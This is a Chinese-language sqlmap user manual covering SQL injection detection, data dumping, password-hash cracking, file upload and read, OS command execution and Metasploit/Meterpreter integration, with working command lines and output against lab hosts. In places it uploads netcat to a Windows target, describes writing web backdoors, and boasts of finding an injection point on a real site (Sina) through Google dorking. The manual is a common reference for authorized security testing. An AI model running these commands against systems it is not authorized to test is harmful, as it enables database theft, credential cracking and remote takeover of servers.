SQLMap用戶手冊【超詳細】

http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

當給sqlmap這麼一個url的時候,它會:

一、判斷可注入的參數

二、判斷能夠用那種SQL注入技術來注入

三、識別出哪一種數據庫

四、根據用戶選擇,讀取哪些數據

sqlmap支持五種不一樣的注入模式:

一、基於布爾的盲注,便可以根據返回頁面判斷條件真假的注入。

二、基於時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增長)來判斷。

三、基於報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。

四、聯合查詢注入,可使用union的狀況下的注入。

五、堆查詢注入,能夠同時執行多條語句的執行時的注入。

sqlmap支持的數據庫有:

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

能夠提供一個簡單的URL,Burp或WebScarab請求日誌文件,文本文檔中的完整http請求或者Google的搜索,匹配出結果頁面,也能夠本身定義一個正則來判斷那個地址去測試。

測試GET參數,POST參數,HTTP Cookie參數,HTTP User-Agent頭和HTTP Referer頭來確認是否有SQL注入,它也能夠指定用逗號分隔的列表的具體參數來測試。

能夠設定HTTP(S)請求的併發數,來提升盲注時的效率。

Youtube上有人作的使用sqlmap的視頻:

http://www.youtube.com/user/inquisb/videos

http://www.youtube.com/user/stamparm/videos

使用sqlmap的實例文章:

http://unconciousmind.blogspot.com/search/label/sqlmap

能夠點擊https://github.com/sqlmapproject/sqlmap/tarball/master下載最新版本sqlmap。

也可使用git來獲取sqlmap

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

以後能夠直接使用命令來更新

python sqlmap.py --update

或者

git pull

更新sqlmap

若是你想觀察sqlmap對一個點是進行了怎樣的嘗試判斷以及讀取數據的,可使用-v參數。

共有七個等級,默認爲1:

0、只顯示python錯誤以及嚴重的信息。

一、同時顯示基本信息和警告信息。(默認)

二、同時顯示debug信息。

三、同時顯示注入的payload。

四、同時顯示HTTP請求。

五、同時顯示HTTP響應頭。

六、同時顯示HTTP響應頁面。

若是你想看到sqlmap發送的測試payload最好的等級就是3。
獲取目標方式
目標URL

參數:-u或者--url

格式:http(s)://targeturl[:port]/[…]

例如:python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

從Burp或者WebScarab代理中獲取日誌

參數:-l

能夠直接吧Burp proxy或者WebScarab proxy中的日誌直接倒出來交給sqlmap來一個一個檢測是否有注入。
從文本中獲取多個目標掃描

參數:-m

文件中保存url格式以下,sqlmap會一個一個檢測

www.target1.com/vuln1.php?q=foobar

www.target2.com/vuln2.asp?id=1

www.target3.com/vuln3/id/1*

從文件中加載HTTP請求

參數:-r

sqlmap能夠從一個文本文件中獲取HTTP請求,這樣就能夠跳過設置一些其餘參數(好比cookie,POST數據,等等)。

好比文本文件內以下:

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1

當請求是HTTPS的時候你須要配合這個--force-ssl參數來使用,或者你能夠在Host頭後門加上:443
處理Google的搜索結果

參數:-g

sqlmap能夠測試注入Google的搜索結果中的GET參數(只獲取前100個結果)。

例子:

python sqlmap.py -g "inurl:\".php?id=1\""

(很牛B的功能,測試了一下,第十幾個就找到新浪的一個注入點)

此外可使用-c參數加載sqlmap.conf文件裏面的相關配置。
請求
http數據

參數:--data

此參數是把數據以POST方式提交,sqlmap會像檢測GET參數同樣檢測POST的參數。

例子:

python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

參數拆分字符

參數:--param-del

當GET或POST的數據須要用其餘字符分割測試參數的時候須要用到此參數。

例子:

python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

HTTP cookie頭

參數:--cookie,--load-cookies,--drop-set-cookie

這個參數在如下兩個方面頗有用:

一、web應用須要登錄的時候。

二、你想要在這些頭參數中測試SQL注入時。

能夠經過抓包把cookie獲取到,複製出來,而後加到--cookie參數裏。

在HTTP請求中,遇到Set-Cookie的話,sqlmap會自動獲取而且在之後的請求中加入,而且會嘗試SQL注入。

若是你不想接受Set-Cookie可使用--drop-set-cookie參數來拒接。

當你使用--cookie參數時,當返回一個Set-Cookie頭的時候,sqlmap會詢問你用哪一個cookie來繼續接下來的請求。當--level的參數設定爲2或者2以上的時候,sqlmap會嘗試注入Cookie參數。
HTTP User-Agent頭

參數:--user-agent,--random-agent

默認狀況下sqlmap的HTTP請求頭中User-Agent值是:

sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

可使用--user-anget參數來修改,同時也可使用--random-agnet參數來隨機的從./txt/user-agents.txt中獲取。

當--level參數設定爲3或者3以上的時候,會嘗試對User-Angent進行注入。
HTTP Referer頭

參數:--referer

sqlmap能夠在請求中僞造HTTP中的referer,當--level參數設定爲3或者3以上的時候會嘗試對referer注入。
額外的HTTP頭

參數:--headers

能夠經過--headers參數來增長額外的http頭
HTTP認證保護

參數:--auth-type,--auth-cred

這些參數能夠用來登錄HTTP的認證保護支持三種方式:

一、Basic

二、Digest

三、NTLM

例子:

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP協議的證書認證

參數:--auth-cert

當Web服務器須要客戶端證書進行身份驗證時,須要提供兩個文件:key_file,cert_file。

key_file是格式爲PEM文件,包含着你的私鑰,cert_file是格式爲PEM的鏈接文件。
HTTP(S)代理

參數:--proxy,--proxy-cred和--ignore-proxy

使用--proxy代理是格式爲:http://url:port。

當HTTP(S)代理須要認證是可使用--proxy-cred參數:username:password。

--ignore-proxy拒絕使用本地局域網的HTTP(S)代理。
HTTP請求延遲

參數:--delay

能夠設定兩個HTTP(S)請求間的延遲,設定爲0.5的時候是半秒,默認是沒有延遲的。
設定超時時間

參數:--timeout

能夠設定一個HTTP(S)請求超過多久斷定爲超時,10.5表示10.5秒,默認是30秒。
設定重試超時

參數:--retries

當HTTP(S)超時時,能夠設定從新嘗試鏈接次數,默認是3次。
設定隨機改變的參數值

參數:--randomize

能夠設定某一個參數值在每一次請求中隨機的變化,長度和類型會與提供的初始值同樣。
利用正則過濾目標網址

參數:--scope

例如:

python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

避免過多的錯誤請求被屏蔽

參數:--safe-url,--safe-freq

有的web應用程序會在你屢次訪問錯誤的請求時屏蔽掉你之後的全部請求,這樣在sqlmap進行探測或者注入的時候可能形成錯誤請求而觸發這個策略,致使之後沒法進行。

繞過這個策略有兩種方式:

一、--safe-url:提供一個安全不錯誤的鏈接,每隔一段時間都會去訪問一下。
二、--safe-freq:提供一個安全不錯誤的鏈接,每次測試請求以後都會再訪問一邊安全鏈接。

關掉URL參數值編碼

參數:--skip-urlencode

根據參數位置,他的值默認將會被URL編碼,可是有些時候後端的web服務器不遵照RFC標準,只接受不通過URL編碼的值,這時候就須要用--skip-urlencode參數。
每次請求時候執行自定義的python代碼

參數:--eval

在有些時候,須要根據某個參數的變化,而修改另個一參數,才能造成正常的請求,這時能夠用--eval參數在每次請求時根據所寫python代碼作完修改後請求。

例子:

python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

上面的請求就是每次請求時根據id參數值,作一次md5後做爲hash參數的值。
注入
測試參數

參數:-p,--skip

sqlmap默認測試全部的GET和POST參數,當--level的值大於等於2的時候也會測試HTTP Cookie頭的值,當大於等於3的時候也會測試User-Agent和HTTP Referer頭的值。可是你能夠手動用-p參數設置想要測試的參數。例如: -p "id,user-anget"

當你使用--level的值很大可是有個別參數不想測試的時候可使用--skip參數。

例如:--skip="user-angent.referer"

在有些時候web服務器使用了URL重寫,致使沒法直接使用sqlmap測試參數,能夠在想測試的參數後面加*

例如:

python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

sqlmap將會測試value1的位置是否可注入。
指定數據庫

參數:--dbms

默認狀況系sqlmap會自動的探測web應用後端的數據庫是什麼,sqlmap支持的數據庫有:

MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAP MaxDB、DB2

指定數據庫服務器系統

參數:--os

默認狀況下sqlmap會自動的探測數據庫服務器系統,支持的系統有:Linux、Windows。
指定無效的大數字

參數:--invalid-bignum

當你想指定一個報錯的數值時,可使用這個參數,例如默認狀況系id=13,sqlmap會變成id=-13來報錯,你能夠指定好比id=9999999來報錯。
只定無效的邏輯

參數:--invalid-logical

緣由同上,能夠指定id=13把原來的id=-13的報錯改爲id=13 AND 18=19。
注入payload

參數:--prefix,--suffix

在有些環境中,須要在注入的payload的前面或者後面加一些字符,來保證payload的正常執行。

例如,代碼中是這樣調用數據庫的:

$query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1"; 

這時你就須要--prefix和--suffix參數了:

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" --suffix "AND (’abc’=’abc"

這樣執行的SQL語句變成:

$query = "SELECT * FROM users WHERE id=(’1’) <PAYLOAD> AND (’abc’=’abc’) LIMIT 0, 1"; 

修改注入的數據

參數:--tamper

sqlmap除了使用CHAR()函數來防止出現單引號以外沒有對注入的數據修改,你可使用--tamper參數對數據作修改來繞過WAF等設備。

下面是一個tamper腳本的格式:

# Needed imports
from lib.core.enums import PRIORITY
# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL
def tamper(payload):
    '''
    Description of your tamper script
    '''
    retVal = payload
    # your code to tamper the original payload
    # return the tampered payload
    return retVal

能夠查看 tamper/ 目錄下的有哪些可用的腳本

例如:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(
58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/
ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/
group/**/bY/**/x)a)
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause' injectable
[...]

探測
探測等級

參數:--level

共有五個等級,默認爲1,sqlmap使用的payload能夠在xml/payloads.xml中看到,你也能夠根據相應的格式添加本身的payload。

這個參數不只影響使用哪些payload同時也會影響測試的注入點,GET和POST的數據都會測試,HTTP Cookie在level爲2的時候就會測試,HTTP User-Agent/Referer頭在level爲3的時候就會測試。

總之在你不肯定哪一個payload或者參數爲注入點的時候,爲了保證全面性,建議使用高的level值。
風險等級

參數:--risk

共有四個風險等級,默認是1會測試大部分的測試語句,2會增長基於事件的測試語句,3會增長OR語句的SQL注入測試。

在有些時候,例如在UPDATE的語句中,注入一個OR的測試語句,可能致使更新的整個表,可能形成很大的風險。

測試的語句一樣能夠在xml/payloads.xml中找到,你也能夠自行添加payload。
頁面比較

參數:--string,--not-string,--regexp,--code

默認狀況下sqlmap經過判斷返回頁面的不一樣來判斷真假,但有時候這會產生偏差,由於有的頁面在每次刷新的時候都會返回不一樣的代碼,好比頁面當中包含一個動態的廣告或者其餘內容,這會致使sqlmap的誤判。此時用戶能夠提供一個字符串或者一段正則匹配,在原始頁面與真條件下的頁面都存在的字符串,而錯誤頁面中不存在(使用--string參數添加字符串,--regexp添加正則),同時用戶能夠提供一段字符串在原始頁面與真條件下的頁面都不存在的字符串,而錯誤頁面中存在的字符串(--not-string添加)。用戶也能夠提供真與假條件返回的HTTP狀態碼不同來注入,例如,響應200的時候爲真,響應401的時候爲假,能夠添加參數--code=200。

參數:--text-only,--titles

有些時候用戶知道真條件下的返回頁面與假條件下返回頁面是不一樣位置在哪裏可使用--text-only(HTTP響應體中不一樣)--titles(HTML的title標籤中不一樣)。
注入技術
測試是不是注入

參數:--technique

這個參數能夠指定sqlmap使用的探測技術,默認狀況下會測試全部的方式。

支持的探測方式以下:

B: Boolean-based blind SQL injection(布爾型注入)
E: Error-based SQL injection(報錯型注入)
U: UNION query SQL injection(可聯合查詢注入)
S: Stacked queries SQL injection(可多語句查詢注入)
T: Time-based blind SQL injection(基於時間延遲注入)

設定延遲注入的時間

參數:--time-sec

當使用繼續時間的盲注時,時刻使用--time-sec參數設定延時時間,默認是5秒。
設定UNION查詢字段數

參數:--union-cols

默認狀況下sqlmap測試UNION查詢注入會測試1-10個字段數,當--level爲5的時候他會增長測試到50個字段數。設定--union-cols的值應該是一段整數,如:12-16,是測試12-16個字段數。
設定UNION查詢使用的字符

參數:--union-char

默認狀況下sqlmap針對UNION查詢的注入會使用NULL字符,可是有些狀況下會形成頁面返回失敗,而一個隨機整數是成功的,這是你能夠用--union-char只定UNION查詢的字符。
二階SQL注入

參數:--second-order

有些時候注入點輸入的數據看返回結果的時候並非當前的頁面,而是另外的一個頁面,這時候就須要你指定到哪一個頁面獲取響應判斷真假。--second-order後門跟一個判斷頁面的URL地址。
列數據
標誌

參數:-b,--banner

大多數的數據庫系統都有一個函數能夠返回數據庫的版本號,一般這個函數是version()或者變量@@version這主要取決與是什麼數據庫。
用戶

參數:-current-user

在大多數據庫中能夠獲取到管理數據的用戶。
當前數據庫

參數:--current-db

返還當前鏈接的數據庫。
當前用戶是否爲管理用

參數:--is-dba

判斷當前的用戶是否爲管理,是的話會返回True。
列數據庫管理用戶

參數:--users

當前用戶有權限讀取包含全部用戶的表的權限時,就能夠列出全部管理用戶。
列出並破解數據庫用戶的hash

參數:--passwords

當前用戶有權限讀取包含用戶密碼的彪的權限時,sqlmap會現列舉出用戶,而後列出hash,並嘗試破解。

例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
    password hash: md5d7d880f96044b72d0bba108ace96d1e4
    clear-text password: testpass
[*] testuser [1]:
    password hash: md599e5ea7a6f7c3269995cba3927fd0093
    clear-text password: testpass

能夠看到sqlmap不只勒出數據庫的用戶跟密碼,同時也識別出是PostgreSQL數據庫,並詢問用戶是否採用字典爆破的方式進行破解,這個爆破已經支持Oracle和Microsoft SQL Server。

也能夠提供-U參數來指定爆破哪一個用戶的hash。
列出數據庫管理員權限

參數:--privileges

當前用戶有權限讀取包含全部用戶的表的權限時,極可能列舉出每一個用戶的權限,sqlmap將會告訴你哪一個是數據庫的超級管理員。也能夠用-U參數指定你想看哪一個用戶的權限。
列出數據庫管理員角色

參數:--roles

當前用戶有權限讀取包含全部用戶的表的權限時,極可能列舉出每一個用戶的角色,也能夠用-U參數指定你想看哪一個用戶的角色。

僅適用於當前數據庫是Oracle的時候。
列出數據庫系統的數據庫

參數:--dbs

當前用戶有權限讀取包含全部數據庫列表信息的表中的時候,便可列出全部的數據庫。
列舉數據庫表

參數:--tables,--exclude-sysdbs,-D

當前用戶有權限讀取包含全部數據庫表信息的表中的時候,便可列出一個特定數據的全部表。

若是你不提供-D參數來列指定的一個數據的時候,sqlmap會列出數據庫全部庫的全部表。

--exclude-sysdbs參數是指包含了全部的系統數據庫。

須要注意的是在Oracle中你須要提供的是TABLESPACE_NAME而不是數據庫名稱。
列舉數據庫表中的字段

參數:--columns,-C,-T,-D

當前用戶有權限讀取包含全部數據庫表信息的表中的時候,便可列出指定數據庫表中的字段,同時也會列出字段的數據類型。

若是沒有使用-D參數指定數據庫時,默認會使用當前數據庫。

列舉一個SQLite的例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users -C name
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+

列舉數據庫系統的架構

參數:--schema,--exclude-sysdbs

用戶能夠用此參數獲取數據庫的架構,包含全部的數據庫,表和字段,以及各自的類型。

加上--exclude-sysdbs參數,將不會獲取數據庫自帶的系統庫內容。

MySQL例子:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --schema --batch --exclude-sysdbs
[...]
Database: owasp10
Table: accounts
[4 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| cid         | int(11) |
| mysignature | text    |
| password    | text    |
| username    | text    |
+-------------+---------+

Database: owasp10
Table: blogs_table
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| date         | datetime |
| blogger_name | text     |
| cid          | int(11)  |
| comment      | text     |
+--------------+----------+

Database: owasp10
Table: hitlog
[6 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| date     | datetime |
| browser  | text     |
| cid      | int(11)  |
| hostname | text     |
| ip       | text     |
| referer  | text     |
+----------+----------+

Database: testdb
Table: users
[3 columns]
+---------+---------------+
| Column  | Type          |
+---------+---------------+
| id      | int(11)       |
| name    | varchar(500)  |
| surname | varchar(1000) |
+---------+---------------+
[...]

獲取表中數據個數

參數:--count

有時候用戶只想獲取表中的數據個數而不是具體的內容,那麼就可使用這個參數。

列舉一個Microsoft SQL Server例子:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

獲取整個表的數據

參數:--dump,-C,-T,-D,--start,--stop,--first,--last

若是當前管理員有權限讀取數據庫其中的一個表的話,那麼就能獲取真個表的全部內容。

使用-D,-T參數指定想要獲取哪一個庫的哪一個表,不適用-D參數時,默認使用當前庫。

列舉一個Firebird的例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+

能夠獲取指定庫中的全部表的內容,只用-dump跟-D參數(不使用-T與-C參數)。

也能夠用-dump跟-C獲取指定的字段內容。

sqlmap爲每一個表生成了一個CSV文件。

若是你只想獲取一段數據,可使用--start和--stop參數,例如,你只想獲取第一段數據可hi使用--stop 1,若是想獲取第二段與第三段數據,使用參數 --start 1 --stop 3。

也能夠用--first與--last參數,獲取第幾個字符到第幾個字符的內容,若是你想獲取字段中地三個字符到第五個字符的內容,使用--first 3 --last 5,只在盲注的時候使用,由於其餘方式能夠準確的獲取注入內容,不須要一個字符一個字符的猜解。
獲取全部數據庫表的內容

參數:--dump-all,--exclude-sysdbs

使用--dump-all參數獲取全部數據庫表的內容,可同時加上--exclude-sysdbs只獲取用戶數據庫的表,須要注意在Microsoft SQL Server中master數據庫沒有考慮成爲一個系統數據庫,由於有的管理員會把他當初用戶數據庫同樣來使用它。
搜索字段,表,數據庫

參數:--search,-C,-T,-D

--search能夠用來尋找特定的數據庫名,全部數據庫中的特定表名,全部數據庫表中的特定字段。

能夠在一下三種狀況下使用:

-C後跟着用逗號分割的列名,將會在全部數據庫表中搜索指定的列名。
-T後跟着用逗號分割的表名,將會在全部數據庫中搜索指定的表名
-D後跟着用逗號分割的庫名,將會在全部數據庫中搜索指定的庫名。

運行自定義的SQL語句

參數:--sql-query,--sql-shell

sqlmap會自動檢測肯定使用哪一種SQL注入技術,如何插入檢索語句。

若是是SELECT查詢語句,sqlap將會輸出結果。若是是經過SQL注入執行其餘語句,須要測試是否支持多語句執行SQL語句。

列舉一個Mircrosoft SQL Server 2000的例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1

[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':    'foo'

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2

[...]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into 
distinct queries to be able to retrieve the output even if we are going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), 
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), 
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
SELECT 'foo', 'bar':    'foo, bar'

爆破
暴力破解表名

參數:--common-tables

當使用--tables沒法獲取到數據庫的表時,可使用此參數。

一般是以下狀況:

一、MySQL數據庫版本小於5.0,沒有information_schema表。
二、數據庫是Microssoft Access,系統表MSysObjects是不可讀的(默認)。
三、當前用戶沒有權限讀取系統中保存數據結構的表的權限。

暴力破解的表在txt/common-tables.txt文件中,你能夠本身添加。

列舉一個MySQL 4.1的例子:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner

[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL &lt; 5.0.0
banner:    '4.1.21-community-nt'

[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users

Database: testdb
[1 table]
+-------+
| users |
+-------+

暴力破解列名

參數:--common-columns

與暴力破解表名同樣,暴力跑的列名在txt/common-columns.txt中。
用戶自定義函數注入

參數:--udf-inject,--shared-lib

你能夠經過編譯MySQL注入你自定義的函數(UDFs)或PostgreSQL在windows中共享庫,DLL,或者Linux/Unix中共享對象,sqlmap將會問你一些問題,上傳到服務器數據庫自定義函數,而後根據你的選擇執行他們,當你注入完成後,sqlmap將會移除它們。
系統文件操做
從數據庫服務器中讀取文件

參數:--file-read

當數據庫爲MySQL,PostgreSQL或Microsoft SQL Server,而且當前用戶有權限使用特定的函數。讀取的文件能夠是文本也能夠是二進制文件。

列舉一個Microsoft SQL Server 2005的例子:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1

[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe 
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe

$ file output/192.168.136.129/files/C__example.exe 
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
80386 32-bit

把文件上傳到數據庫服務器中

參數:--file-write,--file-dest

當數據庫爲MySQL,PostgreSQL或Microsoft SQL Server,而且當前用戶有權限使用特定的函數。上傳的文件能夠是文本也能夠是二進制文件。

列舉一個MySQL的例子:

$ file /software/nc.exe.packed 
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL &gt;= 5.0.0

[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 
written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, 
same size as the local file '/software/nc.exe.packed'

運行任意操做系統命令

參數:--os-cmd,--os-shell

當數據庫爲MySQL,PostgreSQL或Microsoft SQL Server,而且當前用戶有權限使用特定的函數。

在MySQL、PostgreSQL,sqlmap上傳一個二進制庫,包含用戶自定義的函數,sys_exec()和sys_eval()。

那麼他建立的這兩個函數能夠執行系統命令。在Microsoft SQL Server,sqlmap將會使用xp_cmdshell存儲過程,若是被禁(在Microsoft SQL Server 2005及以上版本默認禁制),sqlmap會從新啓用它,若是不存在,會自動建立。

列舉一個PostgreSQL的例子:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
--os-cmd id -v 1

[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(postgres)'

[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can 
only be deleted manually

用--os-shell參數也能夠模擬一個真實的shell,能夠輸入你想執行的命令。

當不能執行多語句的時候(好比php或者asp的後端數據庫爲MySQL時),仍然可能使用INTO OUTFILE寫進可寫目錄,來建立一個web後門。支持的語言:

一、ASP
二、ASP.NET
三、JSP
四、PHP

Meterpreter配合使用

參數:--os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path

當數據庫爲MySQL,PostgreSQL或Microsoft SQL Server,而且當前用戶有權限使用特定的函數,能夠在數據庫與攻擊者直接創建TCP鏈接,這個鏈接能夠是一個交互式命令行的Meterpreter會話,sqlmap根據Metasploit生成shellcode,並有四種方式執行它:

一、經過用戶自定義的sys_bineval()函數在內存中執行Metasplit的shellcode,支持MySQL和PostgreSQL數據庫,參數:--os-pwn。
二、經過用戶自定義的函數上傳一個獨立的payload執行,MySQL和PostgreSQL的sys_exec()函數,Microsoft SQL Server的xp_cmdshell()函數,參數:--os-pwn。
三、經過SMB攻擊(MS08-068)來執行Metasploit的shellcode,當sqlmap獲取到的權限足夠高的時候(Linux/Unix的uid=0,Windows是Administrator),--os-smbrelay。
四、經過溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存儲過程(MS09-004),在內存中執行Metasploit的payload,參數:--os-bof

列舉一個MySQL例子:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
&gt; 
[hh:mm:32] [INFO] testing if current user is DBA
